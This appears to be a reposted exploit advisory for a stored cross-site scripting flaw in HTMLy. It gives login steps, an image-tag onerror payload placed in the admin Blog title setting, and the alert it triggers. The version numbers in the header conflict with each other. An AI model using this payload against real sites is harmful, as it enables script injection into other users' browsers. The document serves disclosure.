# Exploit Title: HTMLy Version : 2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see xss alert
文章来源: https://cxsecurity.com/issue/WLB-2024040019
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh